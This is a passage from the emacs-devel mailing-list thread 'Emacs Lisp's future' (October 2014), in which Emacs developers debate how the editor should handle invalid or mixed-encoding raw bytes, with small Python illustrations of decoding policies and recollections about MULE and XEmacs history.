@ 2014-10-13  7:59                                                                         ` David Kastrup
  2014-10-13  8:32                                                                           ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-13  7:59 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     >     What will Emacs do, under this proposal, if the user is asked whether
>     >     to keep the original raw bytes and answers NO?
>     >
>     > Abort the operation, I suppose.
>
>     It's going to be a wagonload of fun if I do
>
>     emacsclient `git grep -l some-pattern`
>
>     in order to edit 30 files and Emacs decides to abort and/or ask each
>     time a comment contains a stray latin-1 character.
>
> I presume not many of these files will have raw bytes in them
> if they are in a system that is being properly maintained.

Like trailing spaces on a line and missing newlines before an end of
file and other whitespace errors: any attempt at correcting those
automatically or prompting for correcting them when you are just working
with material you got from someone else is going to annoy people and
cause problems.

Syntax highlighting may want to point such things out.  That's perfectly
fine.  But anything that disrupts interactive work is out.  I don't want
gratuitous random prompts interfering with the operation of keyboard
macros, for example.

Emacs' current behaviors are the result of dozens of years of user
experience and feedback.  Our current choices are not random.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-13  6:02                                                                     ` Eli Zaretskii
@ 2014-10-13  8:24                                                                       ` Stephen J. Turnbull
  2014-10-13  8:58                                                                         ` David Kastrup
  2014-10-13  9:05                                                                         ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  8:24 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa,
	monnier

Eli Zaretskii writes:

 > There's also the case that the application was invoked on a remote
 > host, and its output is passed via the network (a.k.a. "Tramp").  Not
 > sure if those 3 cases cover that.

My three cases were intended to cover the "local" case, where the user
presumably has control of the files on her system.  The case you are
describing is covered under network streams as far as I'm concerned
(YMMV, that's just the way I broke things down).

 > > An example of (3) is David's case, with AUCTeX handling of TeX error
 > > messages containing non-unibyte text.  AFAIK such applications are
 > > quite rare nowadays.
 > 
 > "Rare" doesn't mean unimportant to users to the degree we can ignore
 > them.  If we do want to cater to those "rare" cases, the only way of
 > doing that is maintain a database of programs and their behaviors.

That's my main strategy, yes.  We have `file-coding-system-alist' for
filename cases, similar features for process and network streams, and
individual modes such as AUCTeX are developed by hackers who have
proved themselves able to take care of themselves.  Emacs can also
provide a way for individual users to opt out of the default
validation mode persistently (eg, provide a global default variable
and use novice mode for the opt-out).
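
To make the "database" idea concrete, here is a small Python sketch of
a policy table loosely modelled on `file-coding-system-alist'.  The
table entries, the names POLICY, policy_for and decode_for, and the
choice of "surrogateescape" as the lenient mode are all assumptions
for illustration, not an existing Emacs interface.

```python
import re

# (pattern, encoding, error handling); the first match wins.
# Every entry here is hypothetical.
POLICY = [
    # Output of a trusted tool with well-understood quirks: keep raw bytes.
    (re.compile(r"\.log\Z"), "utf-8", "surrogateescape"),
    # Ordinary source files: validate strictly.
    (re.compile(r"\.tex\Z"), "utf-8", "strict"),
]
DEFAULT = ("utf-8", "strict")


def policy_for(name):
    """Return (encoding, errors) for the stream or file called NAME."""
    for pattern, encoding, errors in POLICY:
        if pattern.search(name):
            return encoding, errors
    return DEFAULT


def decode_for(name, raw):
    """Decode RAW according to the policy registered for NAME."""
    encoding, errors = policy_for(name)
    return raw.decode(encoding, errors=errors)
```

With this table, decode_for("paper.log", ...) keeps invalid bytes,
while the same bytes under any other name raise UnicodeDecodeError.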

 > Moreover, I don't think case (1) is as easy as you seem to think.

Eli, I live in encoding hell, aka Japan, and have to deal with Chinese
as well (Chinese students often use GB encodings to write Japanese).
Please give me credit for extensive experience with not only broken
implementations, but also bloodyminded standards bodies and users only
half as witty as they think they are.  Nevertheless, things are much
better today than in the days when Erik Naggum declared that "Emacs
has a fatal disease, and its name is 'MULE'".

 > In many cases, a file or a program that you think are "local"
 > really aren't.

Just because a user thinks it local doesn't lower the risk associated
with networks, although it may be somewhat lower than the open
Internet.  This is in the same risk class as other network streams.

I suppose it would be reasonable to distinguish between Internet
streams, local network streams (but only if a valid certificate was
presented, otherwise there's little reason to be confident), and local
files or processes.  But doing that conveniently and accurately sounds
like a painstaking task.

 > > I understand David and Eli to be of the opinion that in practice there
 > > is insignificant risk to Emacs or its users from any form of invalid
 > > or malicious input, from the network or local.  I disagree.
 > 
 > I never said anything like that.

No, you didn't.  I infer it from the policies for Emacs you advocate.

 > What I did say, and stand by, is that doing what you suggest is
 > certain to cause user outcry of the kind I remember very well.

It won't.  There may be outcry, but the world has changed dramatically
from the times you remember, and the outcry will be different (except
for users like yourself who were there at the time and will be upset
by the "regression"[1]).

 > I think it's naive to assume that "this time it will be different";
 > experience has taught me that this attitude is ill-advised.

I don't assume it.  I know for a fact that the world is much more
hostile than it was back then, and I think other conditions have
changed enough that it's time for another experiment, hopefully with a
little bit of attention to design of user interfaces in advance.

 > We shouldn't do that out of our own initiative based on academic
 > considerations and examples from PHP or whatever.

You think spam, viruses, phishing, buffer overrun exploits, and the
like are "academic considerations"?

They aren't, and the attitude that users can and should take care of
themselves is *not* a selling point in this environment, except for
developers who would rather not deal with complex APIs and worse, the
finicky art of providing convenient, unobtrusive, and yet flexible UI.

Footnotes: 
[1]  And I hope that group is a tiny minority, given the rapid growth
in computer usage in just that decade and a half.  If it turns out
that greybeards like us are the majority of users, that's a sad day
for Emacs and for free software.






* Re: Emacs Lisp's future
  2014-10-13  7:59                                                                         ` David Kastrup
@ 2014-10-13  8:32                                                                           ` Eli Zaretskii
  2014-10-13  9:20                                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  8:32 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> From: David Kastrup <dak@gnu.org>
> Cc: eliz@gnu.org,  mhw@netris.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Mon, 13 Oct 2014 09:59:21 +0200
> 
> Syntax highlighting may want to point such things out.  That's perfectly
> fine.

Emacs indeed shows raw bytes in a distinct face.




* Re: Emacs Lisp's future
  2014-10-13  8:24                                                                       ` Stephen J. Turnbull
@ 2014-10-13  8:58                                                                         ` David Kastrup
  2014-10-13  9:45                                                                           ` Stephen J. Turnbull
  2014-10-13  9:05                                                                         ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-13  8:58 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>
>  > There's also the case that the application was invoked on a remote
>  > host, and its output is passed via the network (a.k.a. "Tramp").  Not
>  > sure if those 3 cases cover that.
>
> My three cases were intended to cover the "local" case, where the user
> presumably has control of the files on her system.  The case you are
> describing is covered under network streams as far as I'm concerned
> (YMMV, that's just the way I broke things down).
>
>  > > An example of (3) is David's case, with AUCTeX handling of TeX error
>  > > messages containing non-unibyte text.  AFAIK such applications are
>  > > quite rare nowadays.
>  > 
>  > "Rare" doesn't mean unimportant to users to the degree we can ignore
>  > them.  If we do want to cater to those "rare" cases, the only way of
>  > doing that is maintain a database of programs and their behaviors.
>
> That's my main strategy, yes.  We have `file-coding-system-alist' for
> filename cases, similar features for process and network streams, and
> individual modes such as AUCTeX are developed by hackers who have
> proved themselves able to take care of themselves.

But that's not what happens.  AUCTeX uses the normal defaults.  When
those defaults prove _insufficient_ to do the trick (which happens in
sub-percentages of the total) for finding the corresponding source in a
(normally encoding-correct) buffer of characters by interpreting the
error context messages on a terminal where byte-based linebreaks may
corrupt characters, _then_ the error context messages (which came in from
a terminal with an encoding, so no byte stream exists any more) are
reencoded to utf-8, the line break is removed, and the byte stream is
redecoded and matched again to the source file buffer containing
_characters_ in the same encoding as those used for decoding the
terminal.

So the point is that
a) TeX daring to produce error output on its console does not cause
beeps and interruptions
b) I have a fallback strategy for dealing with that kind of "ugh" that
is _not_ covered by the standard fallback strategies but that can be
hand-implemented _because_ there was no information loss.
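
The reencode, repair, redecode fallback can be sketched in a few lines
of Python.  This is an illustration of the principle only, not the
AUCTeX code: Python's "surrogateescape" handler plays the role of
Emacs's raw-byte characters, the function name is made up, and the
sketch removes every newline where the real thing would only remove
the offending line break.

```python
def rejoin_broken_line(context, encoding="utf-8"):
    """Undo a byte-based line break that split a multibyte character.

    CONTEXT is already-decoded text in which the two halves of the
    split character survive as raw bytes on either side of a newline.
    """
    # Reencode: because decoding lost nothing, this gives back the
    # exact bytes that came from the terminal.
    raw = context.encode(encoding, errors="surrogateescape")
    # Repair at the byte level.
    raw = raw.replace(b"\n", b"")
    # Redecode: the halves now form a valid character again.
    return raw.decode(encoding, errors="surrogateescape")


# "caf\u00e9 x" with a line break between the two bytes of U+00E9.
broken = b"caf\xc3\n\xa9 x".decode("utf-8", errors="surrogateescape")
print(rejoin_broken_line(broken))
```

The round trip is possible only because the first decoding step kept
the undecodable bytes instead of replacing or rejecting them.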

The alternative would be to create an encoding utf-8-with-bad-linebreaks
and the respective coders/recoders and have that as the terminal
encoding for running TeX.

And I have no doubt that people will say that I should be forced to go
that path since it is the "correct" one.

Except that a single TeX run may very well go across several files with
_different_ encodings, so there really is no single "correct" encoding
for the terminal messages of TeX.

Which means that the current "don't mess with things you have not been
told to mess with" behavior leaves the programmer in the situation to
focus on the _actual_ problem rather than fighting Emacs' preconceptions
about what problem he is allowed to encounter.

> Nevertheless, things are much better today than in the days when Erik
> Naggum declared that "Emacs has a fatal disease, and its name is
> 'MULE'".

Erik was the highest profile programmer/user abandoning Emacs for XEmacs
in order to avoid the consequences of multibyte encodings.  I seem to
remember that he blamed the principle of multibyte encodings rather than
the early buggy MULE implementations (the earliest implementations
worked with byte offsets for buffer and string positions so there were
wagonloads of fallout, but I think he also objected to the performance
implications when closing that problem vector by making buffer and
string positions character-based).

I have no idea which Emacs variant he would be using these days if he
were still around.  It may well be XEmacs since part of his objections
against MULE (which is now pretty unavoidable in XEmacs as well
I _think_) was the manner of the top-down decision-making resulting in
its early inclusion in Emacs when it was not all-that-ready.

> I suppose it would be reasonable to distinguish between Internet
> streams, local network streams (but only if a valid certificate was
> presented, otherwise there's little reason to be confident), and local
> files or processes.  But doing that conveniently and accurately sounds
> like a painstaking task.

The only thing one can sensibly do in stacked problems like this is to
have each level deal with its own problems.  And that means that it
needs to pass on data that is not being processed at its own level.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-13  8:24                                                                       ` Stephen J. Turnbull
  2014-10-13  8:58                                                                         ` David Kastrup
@ 2014-10-13  9:05                                                                         ` Eli Zaretskii
  2014-10-13 10:05                                                                           ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  9:05 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa,
	monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: dak@gnu.org,
>     rms@gnu.org,
>     handa@gnu.org,
>     mhw@netris.org,
>     dmantipov@yandex.ru,
>     emacs-devel@gnu.org,
>     mikegerwitz@gnu.org,
>     monnier@iro.umontreal.ca
> Date: Mon, 13 Oct 2014 17:24:39 +0900
> 
>  > We shouldn't do that out of our own initiative based on academic
>  > considerations and examples from PHP or whatever.
> 
> You think spam, viruses, phishing, buffer overrun exploits, and the
> like are "academic considerations"?

How are these relevant to this discussion (well, except for the
unspecified "and the like" part)?  What do these have to do with text
encoding and decoding in general, and with invalid byte sequences in
particular?  Let's stay focused on the topic at hand, OK?

> They aren't, and the attitude that users can and should take care of
> themselves is *not* a selling point in this environment, except for
> developers who would rather not deal with complex APIs and worse, the
> finicky art of providing convenient, unobtrusive, and yet flexible UI.

All I said was that I want to hear about real-life experiences with
these dangers, where the attackers were able to exploit the Emacs text
decoding machinery to their advantage.  I know it's probably possible
to concoct a synthetic use case for that (although even that was not
done in this thread), but I want to see _real-life_ stories.  Then we
will have specific scenarios to talk about, rather than general
unnamed risks, and also won't need to argue about whether "this can
happen".

Historically, any real-life risks that were reported on the Emacs
lists were handled and fixed very quickly and without any discussions
as to whether they should be fixed.  Rest assured that the same will
happen with the kinds of risks discussed here -- if and when someone
shows us a real-life use case where these risks materialize on our
watch.

We arrived at the current modus operandi of Emacs wrt text encoding
and decoding through sweat, blood, and tears of several major
releases.  It is neither an accident nor luck that complaints about
these issues are rarely if at all seen on the user support forums or
here, for the past 2 major releases.  Changing that in response to
considerations not backed up by specific user reports would be a grave
mistake.  If the history of Emacs development since v20.1 in this area
teaches us anything, it is that we, the Emacs developers, are not good
enough in making these decisions based on theoretical arguments and
considerations.  Suit yourself, but I, for one, don't want us to make
that mistake again, ever.




* Re: Emacs Lisp's future
  2014-10-13  8:32                                                                           ` Eli Zaretskii
@ 2014-10-13  9:20                                                                             ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13  9:20 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
>> Cc: eliz@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>> stephen@xemacs.org
>> Date: Mon, 13 Oct 2014 09:59:21 +0200
>> 
>> Syntax highlighting may want to point such things out.  That's perfectly
>> fine.
>
> Emacs indeed shows raw bytes in a distinct face.

Which probably comes at some cost.  I think at one time it provided some
mouse-over information in an overlay and I seem to remember that this
overlay may even have been the _whole_ difference between, say, a raw
byte 0xa0 and the Unicode character at code point 0xa0.

Making this distinction a part of the encoding rather than of a side
channel like an overlay seems quite smart to me.
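
As an analogy only: Python makes the same kind of in-band distinction
with its "surrogateescape" error handler, which maps an undecodable
byte to a reserved code point instead of relying on side information.
The helper name is invented for the example, and the mapping shown is
Python's, not Emacs's internal representation.

```python
def is_raw_byte(ch):
    """True if CH stands for an undecodable byte (U+DC80..U+DCFF)."""
    return 0xDC80 <= ord(ch) <= 0xDCFF


# A stray byte 0xA0, which is not valid UTF-8 on its own.
raw_a0 = b"\xa0".decode("utf-8", errors="surrogateescape")
# The properly encoded character U+00A0 (NO-BREAK SPACE).
nbsp = b"\xc2\xa0".decode("utf-8")

print(is_raw_byte(raw_a0), is_raw_byte(nbsp))
# Each one encodes back to exactly the bytes it came from.
print(raw_a0.encode("utf-8", errors="surrogateescape"))
print(nbsp.encode("utf-8"))
```

Because the difference lives in the string itself, it survives
copying, searching and programmatic use without any display machinery.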

Again: the overlay thing is just some vague memory and it might actually
have been in either Emacs or XEmacs.  At any rate, it would appear to
carry a somewhat excessive cost.  Syntax highlighting also comes at a
cost, but at least it only happens on buffers actually being displayed
rather than in the process of strings and buffers employed
programmatically.

For programmatic use, stray undecodable bytes come at the cost of an
additional byte.  That's cheap enough to be acceptable in more than just
exceptional cases.  And I commend Emacs for doing its best for not
prescribing my decisions and workflow by making some viable choices
unnecessarily expensive or hard.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-13  8:58                                                                         ` David Kastrup
@ 2014-10-13  9:45                                                                           ` Stephen J. Turnbull
  2014-10-13 10:17                                                                             ` Uwe Brauer
  2014-10-13 10:30                                                                             ` David Kastrup
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  9:45 UTC (permalink / raw)
  To: David Kastrup
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

David Kastrup writes:

 > The alternative would be to create an encoding
 > utf-8-with-bad-linebreaks and the respective coders/recoders and
 > have that as the terminal encoding for running TeX.

Actually, Emacs *could* design a sane API where the error handler is
specified separate from the encoding.  This is *much* more important
here than it was with the EOL convention.
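
For comparison, Python's codecs module has this shape: the error
handler is named independently of the encoding.  The sketch below uses
only that existing Python machinery; the handler name "mark-invalid"
and the <XX> marker format are made up for the example, and nothing
here describes an Emacs API.

```python
import codecs


def mark_invalid(err):
    """Replace each undecodable byte with a visible <XX> marker."""
    if not isinstance(err, UnicodeDecodeError):
        raise err
    bad = err.object[err.start:err.end]
    replacement = "".join("<%02X>" % b for b in bad)
    # Resume decoding right after the offending bytes.
    return replacement, err.end


# Register the handler once, under a name of our own choosing.
codecs.register_error("mark-invalid", mark_invalid)


def decode(raw, encoding, on_error="strict"):
    """Decode RAW; ENCODING and ON_ERROR are chosen independently."""
    return raw.decode(encoding, errors=on_error)


# The same handler works unchanged with different encodings.
print(decode(b"a\xffb", "utf-8", "mark-invalid"))
print(decode(b"a\xffb", "ascii", "mark-invalid"))
```

A program that wants strict behavior passes nothing extra and gets an
exception; one with special needs supplies its own handler without
having to define a new encoding.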

 > > Nevertheless, things are much better today than in the days when
 > > Erik Naggum declared that "Emacs has a fatal disease, and its
 > > name is 'MULE'".
 > 
 > Erik was the highest profile programmer/user abandoning Emacs for
 > XEmacs in order to avoid the consequences of multibyte encodings.

If he did, I never heard about it.  ISTR he hated XEmacs worse than he
hated Mule.  I know he stopped following the Emacs mainline, but AFAIK
he either went to a Common Lisp implementation like Hemlock, or rolled
his own based on a pre-Mule version of GNU Emacs, not XEmacs.

 > MULE (which is now pretty unavoidable in XEmacs as well I _think_)

No, XEmacs built fine without Mule as of early summer.  XEmacs 21.5 at
least has limited ability to deal with Unicode without Mule, but I
don't remember exactly how far it goes.  It may be that you're stuck
with Latin 1 characters as the internal repertoire, or it may be able
to deal with Unicode UTFs as long as the stream is limited to a
repertoire contained in a single unibyte character set.  If the
latter, you have to select fonts appropriately since such an XEmacs
knows nothing about non-Unicode character sets other than ASCII.

Of course if you want to deal sensibly with non-ASCII, you need to
build XEmacs with Mule, but there are a lot of American programmers
who don't need that even today.





* Re: Emacs Lisp's future
  2014-10-13  9:05                                                                         ` Eli Zaretskii
@ 2014-10-13 10:05                                                                           ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13 10:05 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz,
	monnier

Eli Zaretskii writes:

 > Historically, any real-life risks that were reported on the Emacs
 > lists were handled and fixed very quickly and without any discussions
 > as to whether they should be fixed.

Fine.  I prefer a more proactive approach, and I've explained why.
You don't think the explanations make sense, no problem for me. ;-)





* Re: Emacs Lisp's future
  2014-10-13  9:45                                                                           ` Stephen J. Turnbull
@ 2014-10-13 10:17                                                                             ` Uwe Brauer
  2014-10-13 10:30                                                                             ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: Uwe Brauer @ 2014-10-13 10:17 UTC (permalink / raw)
  To: emacs-devel

>> "Stephen" == Stephen J Turnbull <stephen@xemacs.org> writes:
   > Actually, Emacs *could* design a sane API where the error handler is
   > specified separate from the encoding.  This is *much* more important
   > here than it was with the EOL convention.


   > If he did, I never heard about it.  ISTR he hated XEmacs worse than he
   > hated Mule.  I know he stopped following the Emacs mainline, but AFAIK
   > he either went to a Common Lisp implementation like Hemlock, or rolled
   > his own based on a pre-Mule version of GNU Emacs, not XEmacs.

He did not.  I recall asking him explicitly (I don't remember in
which context), and he said he would never use XEmacs.


He even published a remove-mule-from-emacs20-survival-kit.





* Re: Emacs Lisp's future
  2014-10-13  9:45                                                                           ` Stephen J. Turnbull
  2014-10-13 10:17                                                                             ` Uwe Brauer
@ 2014-10-13 10:30                                                                             ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13 10:30 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > The alternative would be to create an encoding
>  > utf-8-with-bad-linebreaks and the respective coders/recoders and
>  > have that as the terminal encoding for running TeX.
>
> Actually, Emacs *could* design a sane API where the error handler is
> specified separate from the encoding.  This is *much* more important
> here than it was with the EOL convention.
>
>  > > Nevertheless, things are much better today than in the days when
>  > > Erik Naggum declared that "Emacs has a fatal disease, and its
>  > > name is 'MULE'".
>  > 
>  > Erik was the highest profile programmer/user abandoning Emacs for
>  > XEmacs in order to avoid the consequences of multibyte encodings.
>
> If he did, I never heard about it.  ISTR he hated XEmacs worse than he
> hated Mule.  I know he stopped following the Emacs mainline, but AFAIK
> he either went to a Common Lisp implementation like Hemlock, or rolled
> his own based on a pre-Mule version of GNU Emacs, not XEmacs.

At first glance, indeed I find
<URL:http://www.emacswiki.org/ErikNaggum#toc1>, the "multibyte survival
kit" for Emacs.

Here's some discussion involving Erik Naggum and myself in 1997 about
MULE and Emacs 20
<URL:https://groups.google.com/forum/#!topic/comp.emacs/ge7syiq7oy8>.
Interesting historic read.

Erik says in that thread "XEmacs has done this right: offer MULE as an
option at build-time.".  At any rate, it is funny to see that I propose
using an array-of-characters programming model with underlying multibyte
representation there, which is dismissed by Erik as not tenable.

Of course, it is what we _have_ since about Emacs 20.3 or 20.4 or so.

So at any rate: at a cursory search I find nothing supporting my
statement about Erik and XEmacs, but some references that may explain
the direction I misremember.

I also find that I've been more involved with coding sanity issues than
I remember.  Though I am pretty sure not to the degree of contributing
actual code.

>  > MULE (which is now pretty unavoidable in XEmacs as well I _think_)
>
> No, XEmacs built fine without Mule as of early summer.  XEmacs 21.5 at
> least has limited ability to deal with Unicode without Mule, but I
> don't remember exactly how far it goes.  It may be that you're stuck
> with Latin 1 characters as the internal repertoire, or it may be able
> to deal with Unicode UTFs as long as the stream is limited to a
> repertoire contained in a single unibyte character set.  If the
> latter, you have to select fonts appropriately since such an XEmacs
> knows nothing about non-Unicode character sets other than ASCII.
>
> Of course if you want to deal sensibly with non-ASCII, you need to
> build XEmacs with Mule, but there are a lot of American programmers
> who don't need that even today.

Ok, so that state is basically like the situation Erik lauded XEmacs
for.  My personal impression is that the historical
one-size-must-fit-all approach of Emacs has, after the initial pain it
caused, led to a situation and code base that does a reasonable job at
keeping the costs of versatility in check as well as can be expected.
We don't have the "you should have been using other compilation options"
argument to fall back on, so it had better.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  6:02                                                                     ` Eli Zaretskii
@ 2014-10-13 14:55                                                                     ` Paul Eggert
  2014-10-13 17:18                                                                       ` Stephen J. Turnbull
  2014-10-14  2:11                                                                     ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-13 14:55 UTC (permalink / raw)
  To: emacs-devel

Stephen J. Turnbull wrote:
> The file or application is truly local, provided with the OS or
>      created by the user.  In that case on a well-maintained system,
>      the encoding should be valid

It could easily be mixed.  For example, in the Emacs source code the output of 
the shell command "grep -r she *" produces some text that is UTF-8 and some that 
is 8-bit EUC.  So the shell command's output is not valid even though all its 
input files are valid.  This type of thing is not uncommon.
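
A small Python sketch of the effect, assuming for illustration that the
"8-bit EUC" text is EUC-JP and using made-up sample lines rather than
anything from the Emacs tree:

```python
# Two lines, each valid in its own encoding (the sample text is illustrative).
utf8_line = "she: 日本語\n".encode("utf-8")
euc_line = "she: 日本語\n".encode("euc_jp")

# Each line decodes cleanly with the encoding it was written in.
same_text = utf8_line.decode("utf-8") == euc_line.decode("euc_jp")

# grep simply concatenates matching lines, so the combined stream is mixed.
combined = utf8_line + euc_line

def is_valid(data: bytes, encoding: str) -> bool:
    """Return True if data decodes without error in the given encoding."""
    try:
        data.decode(encoding)
        return True
    except UnicodeDecodeError:
        return False

combined_is_utf8 = is_valid(combined, "utf-8")
combined_is_euc = is_valid(combined, "euc_jp")
```

Neither encoding validates the combined stream, even though each input
line was valid on its own.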




* Re: Emacs Lisp's future
  2014-10-13 14:55                                                                     ` Paul Eggert
@ 2014-10-13 17:18                                                                       ` Stephen J. Turnbull
  2014-10-13 17:24                                                                         ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13 17:18 UTC (permalink / raw)
  To: Paul Eggert; +Cc: emacs-devel

Paul Eggert writes:
 > Stephen J. Turnbull wrote:
 > > The file or application is truly local, provided with the OS or
 > >      created by the user.  In that case on a well-maintained system,
 > >      the encoding should be valid
 > 
 > It could easily be mixed.  For example, in the Emacs source code
 > the output of the shell command "grep -r she *" produces some text
 > that is UTF-8 and some that is 8-bit EUC.  So the shell command's
 > output is not valid even though all its input files are valid.
 > This type of thing is not uncommon.

Not uncommon, but no more (and no less) sensible than "zgrep she
/vmlinuz".  Both commands are useful in some contexts, but neither
command's output should be thought of as "encoded text" in the sense
that any codec I know of can handle and produce useful output for all
of the encodings (or even more than one).

If you're planning further processing you shouldn't allow something as
mechanical as a codec anywhere near that stuff: you should accept it
into a buffer as binary, and do your own conversions based on any
useful heuristics you have.
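
One possible shape for that, sketched in Python: keep the data as bytes
and decode line by line against a caller-supplied list of candidate
encodings.  The function name decode_lines, the candidate list and the
sample data are all assumptions made for the example.

```python
# Sketch: keep the data as bytes, then decode each line with the first
# candidate encoding that accepts it (a heuristic, not a codec).

def decode_lines(data: bytes, candidates=("utf-8", "euc_jp")):
    """Return one (encoding_or_None, text_or_bytes) pair per line."""
    results = []
    for line in data.split(b"\n"):
        for enc in candidates:
            try:
                results.append((enc, line.decode(enc)))
                break
            except UnicodeDecodeError:
                continue
        else:
            # No candidate fits: leave the line as raw bytes.
            results.append((None, line))
    return results

mixed = (
    "日本語".encode("utf-8") + b"\n"
    + "日本語".encode("euc_jp") + b"\n"
    + b"\xff\xfe"
)
decoded = decode_lines(mixed)
```

The order of the candidates is itself a heuristic: a line that happens
to be valid in more than one encoding is attributed to the first one
tried.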





* Re: Emacs Lisp's future
  2014-10-13 17:18                                                                       ` Stephen J. Turnbull
@ 2014-10-13 17:24                                                                         ` David Kastrup
  2014-10-13 17:49                                                                           ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-13 17:24 UTC (permalink / raw)
  To: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Paul Eggert writes:
>  > Stephen J. Turnbull wrote:
>  > > The file or application is truly local, provided with the OS or
>  > >      created by the user.  In that case on a well-maintained system,
>  > >      the encoding should be valid
>  > 
>  > It could easily be mixed.  For example, in the Emacs source code
>  > the output of the shell command "grep -r she *" produces some text
>  > that is UTF-8 and some that is 8-bit EUC.  So the shell command's
>  > output is not valid even though all its input files are valid.
>  > This type of thing is not uncommon.
>
> Not uncommon, but no more (and no less) sensible than "zgrep she
> /vmlinuz".  Both commands are useful in some contexts, but neither
> command's output should be thought of as "encoded text" in the sense
> that any codec I know of can handle and produce useful output for all
> of the encodings (or even more than one).
>
> If you're planning further processing you shouldn't allow something as
> mechanical as a codec anywhere near that stuff: you should accept it
> into a buffer as binary, and do your own conversions based on any
> useful heuristics you have.

Binary is quite unpractical when you are working in a locale and the
vast majority of output fits it.  Then you want to have things displayed
according to locale and have that stuff which doesn't fit formatted as
some sort of recognizable escape sequence.
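
To illustrate the behavior I mean with something other than Emacs:
Python's "backslashreplace" error handler does roughly this when
decoding.  The sample bytes are invented, and this is only an analogy
to what Emacs does, not a description of its internals.

```python
# Mostly valid UTF-8 with one stray Latin-1 byte (0xE9) in the middle.
output = "naïve caf".encode("utf-8") + b"\xe9" + " déjà vu".encode("utf-8")

# "backslashreplace" keeps everything that fits the expected encoding
# and renders each undecodable byte as a visible \xNN escape.
shown = output.decode("utf-8", errors="backslashreplace")
```

Everything that fits the locale stays readable, and the one byte that
does not is still visible and identifiable.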

And I am mighty glad that Emacs does that without some "if Emacs cannot
be 100% correct it should at least be 100% inconvenient" rule getting in
the way of getting work done.

-- 
David Kastrup





* Re: Emacs Lisp's future
  2014-10-13 17:24                                                                         ` David Kastrup
@ 2014-10-13 17:49                                                                           ` Stephen J. Turnbull
  2014-10-13 18:04                                                                             ` David Kastrup
  2014-10-13 19:19                                                                             ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13 17:49 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup writes:

 > Binary is quite unpractical when you are working in a locale

The Emacs source tree evidently doesn't *have* a locale in the
relevant sense since it has multiple encodings.

 > and the vast majority of output fits it.  Then you want to have
 > things displayed according to locale and have that stuff which
 > doesn't fit formatted as some sort of recognizable escape sequence.

For Paul's example, I suppose binary would work just fine, since he's
searching for ASCII and Emacs sources are probably over 95% ASCII.

And in *my* locale, the whole locale concept sucks because no matter
what locale I choose somewhere between 1/3 and 2/3 of the text (all
perfectly intelligible Japanese) will be unreadable according to that
locale.

The real world is stranger and more dangerous than you imagine.





* Re: Emacs Lisp's future
  2014-10-13 17:49                                                                           ` Stephen J. Turnbull
@ 2014-10-13 18:04                                                                             ` David Kastrup
  2014-10-13 19:19                                                                             ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13 18:04 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > Binary is quite unpractical when you are working in a locale
>
> The Emacs source tree evidently doesn't *have* a locale in the
